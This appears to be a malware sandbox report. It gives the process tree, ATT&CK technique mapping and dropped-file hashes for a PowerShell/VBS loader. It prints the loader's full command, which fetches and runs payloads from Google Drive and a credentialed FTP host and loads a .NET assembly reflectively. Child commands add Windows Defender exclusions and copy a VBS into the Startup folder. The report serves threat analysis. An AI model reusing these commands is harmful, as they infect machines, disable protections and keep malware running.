    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $eHJck = $host.Version.Major.Equals(2) ;if ($eHJck) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($QDfGo) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$NyBYc = (New-Object Net.WebClient);$NyBYc.Encoding = [System.Text.Encoding]::UTF8;$NyBYc.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lwnjQ;$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lqVmC.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lwnjQ = $lqVmC.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lqVmC.dispose();$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lwnjQ = $lqVmC.DownloadString( $lwnjQ );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $lwnjQ.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'fX9T3sTe/war/moc.nibetsap//:sptth' , $hzwje , 'true' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5020
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:1136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4392
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      Drops startup file
      PID:628
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:3684
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      Drops startup file
      PID:1164
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4592
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      Drops startup file
      PID:3852
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4736
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2248
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:620
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:3004
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:224
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4564
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:868
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4432
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:3884
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4332
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4744
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4444
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4700
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:3556
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2888
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:5052
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4944
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:3056
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2208
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2392
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:3708
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:1600
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:1104
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:720
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4516
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4508
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2716
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4428
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2996
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:3980
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:908
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:4392
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2340
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2732
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:736
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2684
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:3852
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:2248
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:1616
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:444
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:1220
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:3836
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
      4⤵
      PID:392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
ed8a95faebbebd1fb5bc4e0ce7077947

SHA1
a17d9abfa8023aa6ed4355d3601b0f3c703afe36

SHA256
99dbc6d25cf8ba37b3c67c998c8a7407330ce701e65bfe0a9a1d4965edae0167

SHA512
35129a1dc6383a1e1f9e8cdcc3cdce3c539655c81ddfa37f01e6187fab9017cb760aaca085ae86ef29a78c6cd813062f3d20f0e2f3923f21889f715f12b15ee4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.txt

Filesize
355B

MD5
daa58b938ebe73e880b2cdd8704c6301

SHA1
857c5eaf94dfeb56ba44ac70685c6787a846549c

SHA256
50bae474c92c50383c3e65183eed42e3c05d134b0baf0f5cf6f8095f362f5ee6

SHA512
53d127cf5afe697a77b9ff1658673295be80fbbcc24e8fa5b28d39ce7dd158ddfe1d7e756f189280fb965881a6ff1764ddb0e74325eb24574b1cb466039e999e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qe4cgxs3.i0r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs

Filesize
681KB

MD5
1794218436b165f2161c183c0af24a53

SHA1
53d26bff0dac5b9424d6e21ab7aa80c5b20753cc

SHA256
1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726

SHA512
059e2d5fecd7bf2cfdef7d47c4bfb424344cd28d282e1f979f2b2e0d3afa7dda98f0c441fe93a8be93de0a4ae70d28aedeeae51012b21532b11cbe45cfcbf143

Download Submit
memory/2552-22-0x0000014574670000-0x000001457467A000-memory.dmp

Filesize
40KB

Download
memory/3388-11-0x00007FF810C10000-0x00007FF8116D1000-memory.dmp

Filesize
10.8MB

Download
memory/3388-12-0x00007FF810C10000-0x00007FF8116D1000-memory.dmp

Filesize
10.8MB

Download
memory/3388-62-0x00007FF810C13000-0x00007FF810C15000-memory.dmp

Filesize
8KB

Download
memory/3388-63-0x00007FF810C10000-0x00007FF8116D1000-memory.dmp

Filesize
10.8MB

Download
memory/3388-0-0x00007FF810C13000-0x00007FF810C15000-memory.dmp

Filesize
8KB

Download
memory/3388-10-0x0000021A1AF30000-0x0000021A1AF52000-memory.dmp

Filesize
136KB

Download